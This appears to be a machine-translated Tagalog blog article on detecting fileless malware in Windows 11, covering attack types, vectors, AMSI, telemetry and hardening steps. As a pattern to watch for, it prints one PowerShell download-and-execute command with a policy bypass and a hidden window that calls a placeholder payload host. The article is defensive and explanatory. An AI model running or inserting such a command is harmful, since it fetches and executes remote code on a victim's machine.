Paano matukoy ang mapanganib na fileless malware sa Windows 11

Huling pag-update: 23/11/2025

  • Ang walang file na malware ay tumatakbo sa memorya at inaabuso ang mga lehitimong proseso gaya ng PowerShell at WMI.
  • Ang epektibong pagtuklas ay nangangailangan ng pagsubaybay sa mga gawi at pagsusuri ng memorya, hindi lamang ng mga file.
  • Ang AMSI, proseso ng telemetry, mga panuntunan sa pagbabawas sa ibabaw, at proactive na pangangaso ay mga pangunahing tampok sa Windows 11.
  • Ang pagtitiyaga sa WMI, Registry at MBR, kasama ng firmware at USB, ay nagpapalawak sa ibabaw ng pag-atake.

Paano matukoy ang mapanganib na fileless malware

¿Paano matukoy ang mapanganib na fileless malware? Ang aktibidad ng walang file na pag-atake ay lumaki nang malaki, at para lumala pa, Ang Windows 11 ay hindi immuneAng diskarte na ito ay lumalampas sa disk at umaasa sa memorya at mga lehitimong tool ng system; kaya naman nagpupumilit ang mga programang antivirus na nakabatay sa lagda. Kung naghahanap ka ng isang maaasahang paraan upang makita ito, ang sagot ay nakasalalay sa pagsasama-sama telemetry, pagsusuri ng pag-uugali, at mga kontrol sa Windows.

Sa kasalukuyang ecosystem, ang mga kampanyang nag-aabuso sa PowerShell, WMI, o Mshta ay magkakasamang nabubuhay sa mas sopistikadong mga diskarte gaya ng memory injection, pagtitiyaga "nang hindi hinahawakan" ang disk, at kahit mga pang-aabuso sa firmwareAng susi ay upang maunawaan ang mapa ng banta, ang mga yugto ng pag-atake, at kung ano ang mga senyales na iniiwan nito kahit na nangyayari ang lahat sa loob ng RAM.

Ano ang fileless malware at bakit ito nababahala sa Windows 11?

Kapag pinag-uusapan natin ang tungkol sa mga banta na "walang file", tinutukoy natin ang malisyosong code na iyon Hindi mo kailangang magdeposito ng mga bagong executable sa file system upang gumana. Karaniwan itong ini-inject sa mga tumatakbong proseso at isinasagawa sa RAM, umaasa sa mga interpreter at binary na nilagdaan ng Microsoft (hal., PowerShell, WMI, rundll32, mshtaBinabawasan nito ang iyong footprint at nagbibigay-daan sa iyong i-bypass ang mga engine na naghahanap lamang ng mga kahina-hinalang file.

Kahit na ang mga dokumento ng opisina o mga PDF na nagsasamantala sa mga kahinaan upang maglunsad ng mga utos ay itinuturing na bahagi ng kababalaghan, dahil buhayin ang pagpapatupad sa memorya nang hindi nag-iiwan ng mga kapaki-pakinabang na binary para sa pagsusuri. Pang-aabuso sa macro at DDE Sa Opisina, dahil tumatakbo ang code sa mga lehitimong proseso tulad ng WinWord.

Pinagsasama ng mga attacker ang social engineering (phishing, spam link) sa mga teknikal na bitag: ang pag-click ng user ay nagpasimula ng chain kung saan ang isang script ay nagda-download at nagsasagawa ng huling payload sa memorya, pag-iwas sa pag-iiwan ng bakas sa disk. Ang mga layunin ay mula sa pagnanakaw ng data hanggang sa pagpapatupad ng ransomware, hanggang sa tahimik na paggalaw sa gilid.

Walang file na pag-detect ng malware

Mga tipolohiya sa pamamagitan ng footprint sa system: mula sa 'puro' hanggang sa mga hybrid

Upang maiwasan ang nakakalito na mga konsepto, nakakatulong na paghiwalayin ang mga pagbabanta ayon sa antas ng pakikipag-ugnayan ng mga ito sa file system. Nililinaw ng pagkakategorya na ito ano ang nagpapatuloy, saan nakatira ang code, at anong mga palatandaan ang iniiwan nito?.

Uri I: walang aktibidad ng file

Ang ganap na walang file na malware ay walang sinusulat sa disk. Isang klasikong halimbawa ang pagsasamantala sa a kahinaan sa network (tulad ng EternalBlue vector noong araw) para ipatupad ang backdoor na naninirahan sa kernel memory (mga kaso tulad ng DoublePulsar). Dito, nangyayari ang lahat sa RAM at walang mga artifact sa file system.

Ang isa pang pagpipilian ay ang mahawahan ang firmware ng mga bahagi: BIOS/UEFI, network adapters, USB peripheral (BadUSB-type techniques) o kahit CPU subsystem. Nagpapatuloy ang mga ito sa pamamagitan ng pag-restart at muling pag-install, na may karagdagang kahirapan Ilang produkto ang nagsusuri ng firmwareAng mga ito ay kumplikadong pag-atake, hindi gaanong madalas, ngunit mapanganib dahil sa kanilang palihim at tibay.

Uri II: Hindi direktang aktibidad sa pag-archive

Dito, hindi "iniiwan" ng malware ang sarili nitong executable, ngunit gumagamit ng mga container na pinamamahalaan ng system na mahalagang nakaimbak bilang mga file. Halimbawa, backdoors na halaman mga utos ng powershell sa WMI repository at i-trigger ang pagpapatupad nito gamit ang mga filter ng kaganapan. Posibleng i-install ito mula sa command line nang hindi bumababa ng mga binary, ngunit ang WMI repository ay naninirahan sa disk bilang isang lehitimong database, na nagpapahirap sa paglilinis nang hindi naaapektuhan ang system.

Mula sa isang praktikal na pananaw ay itinuturing silang walang file, dahil ang lalagyan na iyon (WMI, Registry, atbp.) Ito ay hindi isang klasikong detectable executable At ang paglilinis nito ay hindi maliit. Ang resulta: palihim na pagtitiyaga na may kaunting "tradisyonal" na bakas.

Eksklusibong nilalaman - Mag-click Dito  “PAGE_FAULT_IN_NONPAGED_AREA”: Ano ang sanhi nito at kung paano matukoy ang nagkasalang driver

Uri III: Nangangailangan ng mga file upang gumana

Ang ilang mga kaso ay nagpapanatili ng a 'walang file' pagtitiyaga Sa isang lohikal na antas, kailangan nila ng file-based na trigger. Ang karaniwang halimbawa ay Kovter: nagrerehistro ito ng isang pandiwa ng shell para sa isang random na extension; kapag ang isang file na may extension na iyon ay binuksan, isang maliit na script gamit ang mshta.exe ay inilunsad, na muling itinatayo ang malisyosong string mula sa Registry.

Ang trick ay ang mga "bait" na file na ito na may mga random na extension ay hindi naglalaman ng isang masusuri na kargamento, at ang karamihan ng code ay nasa Registro (isa pang lalagyan). Iyon ang dahilan kung bakit sila ay ikinategorya bilang fileless sa epekto, kahit na mahigpit na nagsasalita sila ay nakasalalay sa isa o higit pang mga artifact ng disk bilang isang trigger.

Mga vector at 'host' ng impeksyon: kung saan ito pumapasok at kung saan ito nagtatago

Upang mapabuti ang pagtuklas, mahalagang imapa ang punto ng pagpasok at ang host ng impeksyon. Nakakatulong ang pananaw na ito sa pagdidisenyo mga tiyak na kontrol Unahin ang naaangkop na telemetry.

Pagsasamantala

  • Nakabatay sa file (Uri III): Maaaring samantalahin ng mga dokumento, executable, legacy na Flash/Java file, o LNK file ang browser o ang engine na nagpoproseso ng mga ito upang i-load ang shellcode sa memorya. Ang unang vector ay isang file, ngunit ang payload ay naglalakbay sa RAM.
  • Nakabatay sa network (Uri I): ​​Ang isang package na nagsasamantala sa isang kahinaan (hal., sa SMB) ay nakakamit ng pagpapatupad sa userland o kernel. Pinasikat ng WannaCry ang diskarteng ito. Direktang pag-load ng memorya walang bagong file.

hardware

  • Aparato (Uri I): ​​Ang firmware ng disk o network card ay maaaring baguhin at ipakilala ang code. Mahirap suriin at nagpapatuloy sa labas ng OS.
  • CPU at mga subsystem ng pamamahala (Uri I): ​​Ang mga teknolohiya tulad ng ME/AMT ng Intel ay nagpakita ng mga landas sa Networking at pagpapatupad sa labas ng OSUmaatake ito sa napakababang antas, na may mataas na potensyal na stealth.
  • USB (Uri I): ​​Binibigyang-daan ka ng BadUSB na i-reprogram ang isang USB drive upang magpanggap bilang isang keyboard o NIC at maglunsad ng mga command o mag-redirect ng trapiko.
  • BIOS / UEFI (Uri I): ​​malisyosong firmware reprogramming (mga kaso tulad ng Mebromi) na tumatakbo bago mag-boot ang Windows.
  • Hypervisor (Uri I): ​​Pagpapatupad ng mini-hypervisor sa ilalim ng OS upang itago ang presensya nito. Bihira, ngunit naobserbahan na sa anyo ng mga hypervisor rootkit.

Pagpapatupad at pag-iniksyon

  • Nakabatay sa file (Type III): EXE/DLL/LNK o mga naka-iskedyul na gawain na naglulunsad ng mga iniksyon sa mga lehitimong proseso.
  • Macros (Uri III): Ang VBA sa Opisina ay maaaring mag-decode at magsagawa ng mga payload, kabilang ang buong ransomware, nang may pahintulot ng user sa pamamagitan ng panlilinlang.
  • Script (Uri II): PowerShell, VBScript o JScript mula sa file, command line, mga serbisyo, Pagpaparehistro o WMIMaaaring i-type ng attacker ang script sa isang remote session nang hindi hinahawakan ang disk.
  • Boot record (MBR/Boot) (Uri II): Ang mga pamilyang tulad ni Petya ay ni-overwrite ang boot sector upang kontrolin sa pagsisimula. Ito ay nasa labas ng file system, ngunit naa-access sa OS at mga modernong solusyon na maaaring ibalik ito.

Paano gumagana ang mga walang file na pag-atake: mga yugto at signal

Bagama't hindi sila nag-iiwan ng mga executable na file, ang mga campaign ay sumusunod sa isang phased logic. Ang pag-unawa sa mga ito ay nagbibigay-daan sa pagsubaybay. mga kaganapan at relasyon sa pagitan ng mga proseso na nag-iiwan ng marka.

  • Paunang pag-accessMga pag-atake sa phishing gamit ang mga link o attachment, nakompromisong website, o mga ninakaw na kredensyal. Maraming chain ang nagsisimula sa isang dokumento ng Office na nagti-trigger ng command PowerShell.
  • Pagtitiyaga: backdoors sa pamamagitan ng WMI (mga filter at subscription), Mga susi sa pagpapatupad ng rehistro o mga nakaiskedyul na gawain na muling naglulunsad ng mga script nang walang bagong nakakahamak na file.
  • ExfiltrationKapag nakolekta na ang impormasyon, ipapadala ito sa labas ng network gamit ang mga pinagkakatiwalaang proseso (mga browser, PowerShell, bitsadmin) upang paghaluin ang trapiko.

Ang pattern na ito ay lalong tuso dahil ang mga tagapagpahiwatig ng pag-atake Nagtatago sila sa normalidad: mga argumento sa command-line, pag-chain ng proseso, mga maanomalyang papalabas na koneksyon, o pag-access sa mga injection API.

Mga karaniwang pamamaraan: mula sa memorya hanggang sa pag-record

Ang mga aktor ay umaasa sa isang hanay ng mga pamamaraan na nag-optimize ng stealth. Nakatutulong na malaman ang mga pinakakaraniwan upang i-activate ang epektibong pagtuklas.

  • Naninirahan sa alaala: Naglo-load ng mga payload sa espasyo ng isang pinagkakatiwalaang proseso na naghihintay para sa pag-activate. rootkit at kawit Sa kernel, itinataas nila ang antas ng pagtatago.
  • Pagtitiyaga sa RegistryI-save ang mga naka-encrypt na blobs sa mga key at i-rehydrate ang mga ito mula sa isang lehitimong launcher (mshta, rundll32, wscript). Ang ephemeral installer ay maaaring mag-self-destruct para mabawasan ang footprint nito.
  • Pag-phishing ng kredensyalGamit ang mga ninakaw na username at password, ang umaatake ay nagpapatupad ng mga malalayong shell at halaman tahimik na pag-access sa Registry o WMI.
  • 'Fileless' RansomwareAng pag-encrypt at C2 na komunikasyon ay isinaayos mula sa RAM, na binabawasan ang mga pagkakataon para sa pagtuklas hanggang sa makita ang pinsala.
  • Mga operating kit: mga automated na chain na nakakakita ng mga kahinaan at nag-deploy ng mga memory-only na payload pagkatapos mag-click ng user.
  • Mga dokumentong may code: mga macro at mekanismo tulad ng DDE na nagpapalitaw ng mga utos nang hindi nagse-save ng mga executable sa disk.
Eksklusibong nilalaman - Mag-click Dito  Paano tingnan ang mga pribadong larawan sa Facebook

Ang mga pag-aaral sa industriya ay nagpakita na ng mga kapansin-pansing peak: sa isang panahon ng 2018, a pagtaas ng higit sa 90% sa script-based at PowerShell chain attacks, isang senyales na mas gusto ang vector para sa pagiging epektibo nito.

Ang hamon para sa mga kumpanya at supplier: bakit hindi sapat ang pagharang

Makatutukso na huwag paganahin ang PowerShell o ipagbawal ang mga macro magpakailanman, ngunit Masisira mo ang operasyonAng PowerShell ay isang haligi ng modernong administrasyon at ang Opisina ay mahalaga sa negosyo; Ang blindly blocking ay kadalasang hindi magagawa.

Higit pa rito, may mga paraan upang i-bypass ang mga pangunahing kontrol: pagpapatakbo ng PowerShell sa pamamagitan ng mga DLL at rundll32, mga script ng packaging sa mga EXE, Dalhin ang sarili mong kopya ng PowerShell o kahit na itago ang mga script sa mga imahe at i-extract ang mga ito sa memorya. Samakatuwid, ang pagtatanggol ay hindi maaaring batay lamang sa pagtanggi sa pagkakaroon ng mga kasangkapan.

Ang isa pang karaniwang pagkakamali ay ang pagtatalaga ng buong desisyon sa cloud: kung ang ahente ay kailangang maghintay ng tugon mula sa server, Nawawalan ka ng real-time na pag-iwasMaaaring i-upload ang data ng telemetry upang pagyamanin ang impormasyon, ngunit ang Ang pagpapagaan ay dapat mangyari sa endpoint.

Paano matukoy ang fileless malware sa Windows 11: telemetry at pag-uugali

Ang diskarte sa panalong ay subaybayan ang mga proseso at memoryaHindi mga file. Ang mga nakakahamak na pag-uugali ay mas matatag kaysa sa mga anyo ng isang file, na ginagawa itong perpekto para sa mga makina ng pag-iwas.

  • AMSI (Antimalware Scan Interface)Hinaharang nito ang mga script ng PowerShell, VBScript, o JScript kahit na ang mga ito ay dynamic na binuo sa memorya. Mahusay para sa pagkuha ng mga obfuscated string bago isagawa.
  • Pagsubaybay sa proseso: simula/tapos, PID, mga magulang at anak, mga ruta, mga linya ng utos at mga hash, at mga execution tree para maunawaan ang buong kwento.
  • Pagsusuri ng memorya: pagtuklas ng mga iniksyon, reflective o PE load nang hindi hinahawakan ang disk, at pagsusuri ng mga hindi pangkaraniwang executable na rehiyon.
  • Proteksyon ng panimulang sektor: kontrol at pagpapanumbalik ng MBR/EFI sa kaso ng pakikialam.

Sa Microsoft ecosystem, pinagsasama ng Defender para sa Endpoint ang AMSI, pagsubaybay sa pag-uugaliAng memory scan at cloud-based na machine learning ay ginagamit para sukatin ang mga detection laban sa mga bago o obfuscated na variant. Ang ibang mga vendor ay gumagamit ng mga katulad na diskarte sa mga kernel-resident engine.

Makatotohanang halimbawa ng ugnayan: mula sa dokumento hanggang sa PowerShell

Isipin ang isang chain kung saan nagda-download ang Outlook ng isang attachment, binubuksan ng Word ang dokumento, pinagana ang aktibong nilalaman, at inilunsad ang PowerShell na may mga kahina-hinalang parameter. Ang wastong telemetry ay magpapakita ng Linya ng utos (hal., ExecutionPolicy Bypass, hidden window), pagkonekta sa isang hindi pinagkakatiwalaang domain at paggawa ng child process na nag-i-install mismo sa AppData.

Ang isang ahente na may lokal na konteksto ay may kakayahang huminto at baligtarin malisyosong aktibidad nang walang manu-manong interbensyon, bilang karagdagan sa pag-abiso sa SIEM o sa pamamagitan ng email/SMS. Nagdaragdag ang ilang produkto ng root cause attribution layer (StoryLine-type models), na hindi tumuturo sa nakikitang proseso (Outlook/Word), ngunit sa buong malisyosong thread at ang pinagmulan nito upang komprehensibong linisin ang sistema.

Ang isang karaniwang pattern ng command na dapat bantayan ay maaaring magmukhang ganito: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Ang lohika ay hindi ang eksaktong string, ngunit ang hanay ng mga signal: policy bypass, hidden window, clear download, at in-memory execution.

AMSI, pipeline at papel ng bawat aktor: mula sa endpoint hanggang sa SOC

Higit pa sa pagkuha ng script, isang mahusay na arkitektura ang nag-oorkestra ng mga hakbang na nagpapadali sa pagsisiyasat at pagtugon. Ang mas maraming ebidensya bago isagawa ang pagkarga, mas mabuti., pinakamahusay.

  • Pagharang ng scriptAng AMSI ay naghahatid ng nilalaman (kahit na ito ay nabuo sa mabilisang paraan) para sa static at dynamic na pagsusuri sa isang malware pipeline.
  • Iproseso ang mga kaganapanKinokolekta ang mga PID, binary, hash, ruta, at iba pang data. mga argumento, pagtatatag ng mga puno ng proseso na humantong sa panghuling pagkarga.
  • Pagtuklas at pag-uulatAng mga pagtuklas ay ipinapakita sa console ng produkto at ipinapasa sa mga network platform (NDR) para sa visualization ng campaign.
  • Mga garantiya ng gumagamitKahit na ang isang script ay injected sa memorya, ang framework Hinarang ito ng AMSI sa mga katugmang bersyon ng Windows.
  • Mga kakayahan ng administrator: configuration ng patakaran upang paganahin ang inspeksyon ng script, pag-block batay sa pag-uugali at paggawa ng mga ulat mula sa console.
  • gawain ng SOC: pagkuha ng mga artifact (VM UUID, bersyon ng OS, uri ng script, proseso ng initiator at magulang nito, mga hash at command line) upang muling likhain ang kasaysayan at mga panuntunan sa pag-angat kinabukasan.
Eksklusibong nilalaman - Mag-click Dito  Paano Tanggalin ang Spyware sa Aking Cell Phone?

Kapag pinapayagan ng platform ang pag-export ng buffer ng memorya Kaugnay ng pagpapatupad, ang mga mananaliksik ay maaaring makabuo ng mga bagong pagtuklas at pagyamanin ang depensa laban sa mga katulad na variant.

Mga praktikal na hakbang sa Windows 11: pag-iwas at pangangaso

I-install nang tama ang Windows 11 sa 2025

Bilang karagdagan sa pagkakaroon ng EDR na may memory inspection at AMSI, hinahayaan ka ng Windows 11 na isara ang mga espasyo sa pag-atake at pahusayin ang visibility gamit ang katutubong kontrol.

  • Pagpaparehistro at paghihigpit sa PowerShellPinapagana ang Script Block Logging at Module Logging, inilalapat ang mga restricted mode kung posible, at kinokontrol ang paggamit ng Bypass/Nakatago.
  • Mga Panuntunan sa Attack Surface Reduction (ASR).: hinaharangan ang paglulunsad ng script ng mga proseso ng Opisina at Pang-aabuso sa WMI/PSExec kapag hindi kailangan.
  • Mga patakaran sa macro ng opisina: hindi pinapagana bilang default, panloob na macro signing at mahigpit na mga listahan ng tiwala; sinusubaybayan ang mga legacy na daloy ng DDE.
  • WMI Audit at Registry: sinusubaybayan ang mga subscription sa kaganapan at awtomatikong execution key (Run, RunOnce, Winlogon), pati na rin ang paggawa ng gawain nakaiskedyul.
  • Proteksyon sa pagsisimula: ina-activate ang Secure Boot, sinusuri ang integridad ng MBR/EFI at pinapatunayan na walang mga pagbabago sa pagsisimula.
  • Patching at hardening: nagsasara ng mga mapagsamantalang kahinaan sa mga browser, mga bahagi ng Office, at mga serbisyo ng network.
  • kamalayan: nagsasanay sa mga user at technical team sa phishing at signal ng mga palihim na pagbitay.

Para sa pangangaso, tumuon sa mga query tungkol sa: paggawa ng mga proseso ng Office patungo sa PowerShell/MSHTA, mga argumento na may downloadstring/downloadfileMga script na may malinaw na obfuscation, reflective injection, at papalabas na network sa mga kahina-hinalang TLD. Cross-reference ang mga signal na ito na may reputasyon at dalas upang mabawasan ang ingay.

Ano ang maaaring makita ng bawat makina ngayon?

Pinagsasama ng mga solusyon sa enterprise ng Microsoft ang AMSI, behavioral analytics, suriin ang memorya at proteksyon sa sektor ng boot, kasama ang mga cloud-based na ML na modelo upang masukat laban sa mga umuusbong na banta. Ang iba pang mga vendor ay nagpapatupad ng pagsubaybay sa antas ng kernel upang makilala ang malisyosong software na may awtomatikong pagbabalik ng mga pagbabago.

Isang diskarte batay sa mga kwento ng pagpapatupad Binibigyang-daan ka nitong tukuyin ang ugat na sanhi (halimbawa, isang attachment sa Outlook na nagti-trigger ng chain) at pagaanin ang buong puno: mga script, key, gawain, at intermediate binary, pag-iwas na maipit sa nakikitang sintomas.

Mga karaniwang pagkakamali at kung paano maiiwasan ang mga ito

Paano linisin ang pagpapatala ng Windows nang walang sinisira ang anumang bagay

Ang pagharang sa PowerShell nang walang alternatibong plano sa pamamahala ay hindi lamang hindi praktikal, ngunit mayroon din mga paraan upang tawagin ito nang hindi direktaAng parehong naaangkop sa mga macro: maaaring pamahalaan mo ang mga ito gamit ang mga patakaran at lagda, o ang negosyo ay magdurusa. Mas mainam na tumuon sa telemetry at mga panuntunan sa pag-uugali.

Ang isa pang karaniwang pagkakamali ay ang paniniwalang nalulutas ng mga application ng whitelisting ang lahat: tiyak na umaasa dito ang teknolohiyang walang file. pinagkakatiwalaang appsAng kontrol ay dapat na obserbahan kung ano ang kanilang ginagawa at kung paano sila nauugnay, hindi lamang kung sila ay pinahihintulutan.

Sa lahat ng nasa itaas, hindi na magiging "multo" ang walang file na malware kapag sinusubaybayan mo kung ano talaga ang mahalaga: pag-uugali, memorya, at pinagmulan ng bawat pagpapatupad. Ang pagsasama-sama ng AMSI, rich process telemetry, native Windows 11 controls, at isang EDR layer na may behavioral analysis ay nagbibigay sa iyo ng kalamangan. Idagdag sa equation na makatotohanang mga patakaran para sa mga macro at PowerShell, WMI/Registry na pag-audit, at pangangaso na inuuna ang mga command line at process tree, at mayroon kang depensa na pumutol sa mga chain na ito bago sila gumawa ng tunog.

Kaugnay na artikulo:
mga network ng kompyuter